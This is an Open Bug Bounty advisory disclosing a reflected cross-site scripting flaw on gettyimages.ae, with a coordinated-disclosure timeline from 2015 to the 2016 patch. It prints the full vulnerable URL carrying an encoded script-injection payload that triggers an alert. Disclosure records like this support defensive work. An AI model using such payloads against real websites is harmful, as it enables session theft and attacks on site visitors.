gettyimages.ae XSS vulnerability

2015-11-05T22:11:00
ID OBB:101966
Type openbugbounty
Reporter Spam404
Modified 2016-04-19T15:30:00

Description

Vulnerable URL:
http://www.gettyimages.ae/videos/scriptscriptalertxssposedscript?collections=bbv&excludenudity;=false&family;=editorial&page;=1&phrase;=%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C%2Fscript%3E&sort;=best
Details:

Description| Value
---|---
Patched:| Yes, at 19.04.2016
Latest check for patch:| 19.04.2016 00:13 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 10759
Google Pagerank| 6
VIP website status:| Yes
Check gettyimages.ae SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 5 November, 2015 22:11 GMT
Vulnerability existence verified and confirmed| 5 November, 2015 22:14 GMT
Vulnerability patched by the website owner| 19 April, 2016 15:30 GMT